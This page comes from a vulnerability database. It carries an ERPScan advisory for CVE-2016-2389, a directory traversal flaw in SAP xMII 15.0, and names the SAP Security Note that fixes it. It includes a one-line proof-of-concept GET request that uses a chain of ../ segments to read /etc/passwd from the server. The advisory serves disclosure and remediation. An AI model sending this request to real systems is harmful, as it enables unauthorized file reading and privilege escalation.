Vulners
Lucene search
SAP xMII 15.0 - Directory Traversal
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | The vulnerability of the SAP NetWeaver software integration platform, which allows a hacker to read arbitrary files. | 17 Mar 201600:00 | – | bdu_fstec |
 | CVE-2016-2389 | 8 Jul 202521:02 | – | circl |
 | SAP NetWeaver Manufacturing Integration and Intelligence Catalog Traversal Vulnerability | 18 Feb 201600:00 | – | cnvd |
 | CVE-2016-2389 | 16 Feb 201615:00 | – | cve |
 | CVE-2016-2389 | 16 Feb 201615:00 | – | cvelist |
 | SAP xMII 15.0 - Directory Traversal | 17 May 201600:00 | – | exploitdb |
 | SAP xMII - directory traversal vulnerability | 29 Jul 201500:00 | – | erpscan |
 | SAP xMII 15.0 - Directory Traversal | 17 May 201600:00 | – | exploitpack |
 | SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion | 8 Jun 202604:09 | – | nuclei |
 | CVE-2016-2389 | 16 Feb 201615:59 | – | nvd |
10
Application: SAP xMII
Versions Affected: SAP MII 15.0
Vendor URL: http://SAP.com
Bugs: Directory traversal
Sent: 29.07.2015
Reported: 29.07.2015
Vendor response: 30.07.2015
Date of Public Advisory: 09.02.2016
Reference: SAP Security Note 2230978
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title: SAP xMII – directory traversal vulnerability
Advisory ID: [ERPSCAN-16-009]
Risk: high priority
Advisory URL: https://erpscan.com/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
Date published: 09.02.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: [CWE-36]
Impact: SAP xMII directory traversal, read file from server
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-2389
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Low (L)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality High (H)
I : Impact to Integrity None(N)
A : Impact to Availability None (N)
3. VULNERABILITY DESCRIPTION
An attacker can use a special request to read files from a server to
escalate his or her privileges.
4. VULNERABLE PACKAGES
SAP MII 15.0
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2230978
6. AUTHOR
Dmitry Chastuhin (ERPScan)
7. TECHNICAL DESCRIPTION
An attacker can use xMII function GetFileList to read files from the server.
PoC
GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
8. REPORT TIMELINE
Sent: 29.07.2015
Reported: 29.07.2015
Vendor response: 30.07.2015
Date of Public Advisory: 09.02.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 May 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.83678